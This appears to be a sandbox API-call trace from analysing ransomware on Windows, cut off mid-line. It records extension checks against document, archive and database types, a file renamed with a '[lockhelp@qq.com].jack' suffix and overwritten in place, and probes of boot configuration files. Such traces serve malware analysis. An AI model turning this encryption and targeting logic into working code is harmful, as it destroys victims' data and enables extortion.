[0203.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.134] lstrlenW (lpString=".doc") returned 4 [0203.134] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0203.134] lstrlenW (lpString=".docx") returned 5 [0203.134] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0203.134] lstrlenW (lpString=".pdf") returned 4 [0203.134] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0203.134] lstrlenW (lpString=".xls") returned 4 [0203.134] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0203.134] lstrlenW (lpString=".xlsx") returned 5 [0203.134] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0203.134] lstrlenW (lpString=".ppt") returned 4 [0203.134] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0203.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.134] lstrlenW (lpString=".zip") returned 4 [0203.134] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0203.134] lstrlenW (lpString=".rar") returned 4 [0203.134] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0203.134] lstrlenW (lpString=".bz2") returned 4 [0203.134] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0203.134] lstrlenW (lpString=".7z") returned 3 [0203.134] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0203.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.135] lstrlenW (lpString=".dbf") returned 4 [0203.135] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0203.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.135] lstrlenW (lpString=".1cd") returned 4 [0203.135] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0203.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.135] lstrlenW (lpString=".jpg") returned 4 [0203.135] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0203.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.135] lstrlenW (lpString=".doc") returned 4 [0203.135] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0203.135] lstrlenW (lpString=".docx") returned 5 [0203.135] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0203.135] lstrlenW (lpString=".pdf") returned 4 [0203.135] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0203.135] lstrlenW (lpString=".xls") returned 4 [0203.135] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0203.135] lstrlenW (lpString=".xlsx") returned 5 [0203.135] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0203.135] lstrlenW (lpString=".ppt") returned 4 [0203.135] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0203.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.135] lstrlenW (lpString=".zip") returned 4 [0203.135] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0203.135] lstrlenW (lpString=".rar") returned 4 [0203.135] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0203.135] lstrlenW (lpString=".bz2") returned 4 [0203.135] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0203.135] lstrlenW (lpString=".7z") returned 3 [0203.135] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0203.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.135] lstrlenW (lpString=".dbf") returned 4 [0203.135] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0203.135] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.135] lstrlenW (lpString=".1cd") returned 4 [0203.135] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0203.136] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0203.136] lstrlenW (lpString=".jpg") returned 4 [0203.136] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0203.136] lstrcmpiW (lpString1=".msu", lpString2=".jack") returned 1 [0203.136] lstrlenW (lpString="Windows6.1-KB958488-v6001-x64.msu") returned 33 [0203.136] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0203.136] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=5091790) returned 1 [0203.136] CloseHandle (hObject=0x40c) returned 1 [0203.136] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu")) returned 0x80 [0203.136] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0203.136] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0203.137] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0203.137] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0x0) returned 1 [0203.137] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0203.137] ReadFile (in: hFile=0x40c, lpBuffer=0x4229058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x4229058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.641] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x19e5ef, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0203.641] ReadFile (in: hFile=0x40c, lpBuffer=0x4269058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x4269058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.643] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0203.643] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x49b1ce, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0203.643] ReadFile (in: hFile=0x40c, lpBuffer=0x42a9058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x42a9058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.657] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.657] WriteFile (in: hFile=0x40c, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x355fca8, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fca8*=0xc012e, lpOverlapped=0x0) returned 1 [0204.052] SetEndOfFile (hFile=0x40c) returned 1 [0204.052] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40000) returned 0x4041e30 [0204.052] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0204.052] WriteFile (in: hFile=0x40c, lpBuffer=0x4041e30*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x4041e30*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0204.053] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x19e5ef, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0204.054] WriteFile (in: hFile=0x40c, lpBuffer=0x4041e30*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x4041e30*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0204.056] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x49b1ce, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0204.056] WriteFile (in: hFile=0x40c, lpBuffer=0x4041e30*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x4041e30*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0204.058] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4041e30 | out: hHeap=0x5e0000) returned 1 [0204.058] CloseHandle (hObject=0x40c) returned 1 [0205.304] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0205.304] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.304] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.305] lstrlenW (lpString=".doc") returned 4 [0205.305] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0205.305] lstrlenW (lpString=".docx") returned 5 [0205.305] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0205.305] lstrlenW (lpString=".pdf") returned 4 [0205.305] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0205.305] lstrlenW (lpString=".xls") returned 4 [0205.305] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0205.305] lstrlenW (lpString=".xlsx") returned 5 [0205.305] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0205.305] lstrlenW (lpString=".ppt") returned 4 [0205.305] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0205.305] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.305] lstrlenW (lpString=".zip") returned 4 [0205.305] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0205.305] lstrlenW (lpString=".rar") returned 4 [0205.305] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0205.305] lstrlenW (lpString=".bz2") returned 4 [0205.305] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0205.305] lstrlenW (lpString=".7z") returned 3 [0205.305] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0205.305] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.305] lstrlenW (lpString=".dbf") returned 4 [0205.305] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0205.305] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.305] lstrlenW (lpString=".1cd") returned 4 [0205.305] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0205.305] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.305] lstrlenW (lpString=".jpg") returned 4 [0205.306] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0205.306] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.306] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.306] lstrlenW (lpString=".doc") returned 4 [0205.306] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0205.306] lstrlenW (lpString=".docx") returned 5 [0205.306] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0205.306] lstrlenW (lpString=".pdf") returned 4 [0205.306] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0205.306] lstrlenW (lpString=".xls") returned 4 [0205.306] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0205.306] lstrlenW (lpString=".xlsx") returned 5 [0205.306] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0205.306] lstrlenW (lpString=".ppt") returned 4 [0205.306] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0205.306] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.306] lstrlenW (lpString=".zip") returned 4 [0205.306] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0205.306] lstrlenW (lpString=".rar") returned 4 [0205.306] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0205.306] lstrlenW (lpString=".bz2") returned 4 [0205.306] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0205.306] lstrlenW (lpString=".7z") returned 3 [0205.306] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0205.306] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.306] lstrlenW (lpString=".dbf") returned 4 [0205.306] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0205.306] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.306] lstrlenW (lpString=".1cd") returned 4 [0205.307] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0205.307] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0205.307] lstrlenW (lpString=".jpg") returned 4 [0205.307] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0205.307] lstrlenW (lpString="BCD") returned 3 [0205.307] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.307] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.307] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.307] lstrlenW (lpString=".doc") returned 4 [0205.307] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0205.307] lstrlenW (lpString=".docx") returned 5 [0205.307] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0205.307] lstrlenW (lpString=".pdf") returned 4 [0205.307] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0205.307] lstrlenW (lpString=".xls") returned 4 [0205.307] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0205.307] lstrlenW (lpString=".xlsx") returned 5 [0205.307] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0205.307] lstrlenW (lpString=".ppt") returned 4 [0205.307] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.308] lstrlenW (lpString=".zip") returned 4 [0205.308] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString=".rar") returned 4 [0205.308] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString=".bz2") returned 4 [0205.308] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString=".7z") returned 3 [0205.308] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0205.308] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.308] lstrlenW (lpString=".dbf") returned 4 [0205.308] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.308] lstrlenW (lpString=".1cd") returned 4 [0205.308] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.308] lstrlenW (lpString=".jpg") returned 4 [0205.308] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.308] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.308] lstrlenW (lpString=".doc") returned 4 [0205.308] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString=".docx") returned 5 [0205.308] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0205.308] lstrlenW (lpString=".pdf") returned 4 [0205.308] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString=".xls") returned 4 [0205.308] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0205.308] lstrlenW (lpString=".xlsx") returned 5 [0205.309] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0205.309] lstrlenW (lpString=".ppt") returned 4 [0205.309] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0205.309] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.309] lstrlenW (lpString=".zip") returned 4 [0205.309] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0205.309] lstrlenW (lpString=".rar") returned 4 [0205.309] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0205.309] lstrlenW (lpString=".bz2") returned 4 [0205.309] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0205.309] lstrlenW (lpString=".7z") returned 3 [0205.309] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0205.309] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.309] lstrlenW (lpString=".dbf") returned 4 [0205.309] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0205.309] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.309] lstrlenW (lpString=".1cd") returned 4 [0205.309] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0205.309] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0205.309] lstrlenW (lpString=".jpg") returned 4 [0205.309] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0205.309] lstrcmpiW (lpString1=".LOG1", lpString2=".jack") returned 1 [0205.309] lstrlenW (lpString="BCD.LOG1") returned 8 [0205.309] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.310] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=0) returned 1 [0205.310] CloseHandle (hObject=0x40c) returned 1 [0205.310] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.310] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.310] lstrlenW (lpString=".doc") returned 4 [0205.310] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0205.310] lstrlenW (lpString=".docx") returned 5 [0205.310] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0205.310] lstrlenW (lpString=".pdf") returned 4 [0205.310] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0205.310] lstrlenW (lpString=".xls") returned 4 [0205.310] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0205.310] lstrlenW (lpString=".xlsx") returned 5 [0205.310] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0205.310] lstrlenW (lpString=".ppt") returned 4 [0205.310] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0205.310] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.310] lstrlenW (lpString=".zip") returned 4 [0205.310] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0205.311] lstrlenW (lpString=".rar") returned 4 [0205.311] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0205.311] lstrlenW (lpString=".bz2") returned 4 [0205.311] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0205.311] lstrlenW (lpString=".7z") returned 3 [0205.311] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0205.311] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.311] lstrlenW (lpString=".dbf") returned 4 [0205.311] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0205.311] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.311] lstrlenW (lpString=".1cd") returned 4 [0205.311] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0205.311] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.311] lstrlenW (lpString=".jpg") returned 4 [0205.311] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0205.311] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.311] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.311] lstrlenW (lpString=".doc") returned 4 [0205.311] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0205.311] lstrlenW (lpString=".docx") returned 5 [0205.311] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0205.311] lstrlenW (lpString=".pdf") returned 4 [0205.311] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0205.311] lstrlenW (lpString=".xls") returned 4 [0205.311] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0205.311] lstrlenW (lpString=".xlsx") returned 5 [0205.311] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0205.311] lstrlenW (lpString=".ppt") returned 4 [0205.312] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0205.312] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.312] lstrlenW (lpString=".zip") returned 4 [0205.312] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0205.312] lstrlenW (lpString=".rar") returned 4 [0205.312] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0205.312] lstrlenW (lpString=".bz2") returned 4 [0205.312] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0205.312] lstrlenW (lpString=".7z") returned 3 [0205.312] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0205.312] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.312] lstrlenW (lpString=".dbf") returned 4 [0205.312] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0205.312] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.312] lstrlenW (lpString=".1cd") returned 4 [0205.312] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0205.312] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0205.312] lstrlenW (lpString=".jpg") returned 4 [0205.312] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0205.312] lstrcmpiW (lpString1=".LOG2", lpString2=".jack") returned 1 [0205.312] lstrlenW (lpString="BCD.LOG2") returned 8 [0205.312] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.313] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=0) returned 1 [0205.313] CloseHandle (hObject=0x40c) returned 1 [0205.313] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.313] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.313] lstrlenW (lpString=".doc") returned 4 [0205.313] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0205.313] lstrlenW (lpString=".docx") returned 5 [0205.313] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0205.313] lstrlenW (lpString=".pdf") returned 4 [0205.313] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0205.313] lstrlenW (lpString=".xls") returned 4 [0205.313] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0205.313] lstrlenW (lpString=".xlsx") returned 5 [0205.313] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0205.313] lstrlenW (lpString=".ppt") returned 4 [0205.313] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0205.313] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.313] lstrlenW (lpString=".zip") returned 4 [0205.313] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0205.314] lstrlenW (lpString=".rar") returned 4 [0205.314] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0205.314] lstrlenW (lpString=".bz2") returned 4 [0205.314] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0205.314] lstrlenW (lpString=".7z") returned 3 [0205.314] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0205.314] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.314] lstrlenW (lpString=".dbf") returned 4 [0205.314] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0205.314] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.314] lstrlenW (lpString=".1cd") returned 4 [0205.314] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0205.314] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.314] lstrlenW (lpString=".jpg") returned 4 [0205.314] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0205.314] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.314] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.314] lstrlenW (lpString=".doc") returned 4 [0205.314] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0205.314] lstrlenW (lpString=".docx") returned 5 [0205.314] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0205.314] lstrlenW (lpString=".pdf") returned 4 [0205.314] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0205.314] lstrlenW (lpString=".xls") returned 4 [0205.314] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0205.314] lstrlenW (lpString=".xlsx") returned 5 [0205.314] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0205.315] lstrlenW (lpString=".ppt") returned 4 [0205.315] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0205.315] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.315] lstrlenW (lpString=".zip") returned 4 [0205.315] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0205.315] lstrlenW (lpString=".rar") returned 4 [0205.315] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0205.315] lstrlenW (lpString=".bz2") returned 4 [0205.315] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0205.315] lstrlenW (lpString=".7z") returned 3 [0205.315] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned 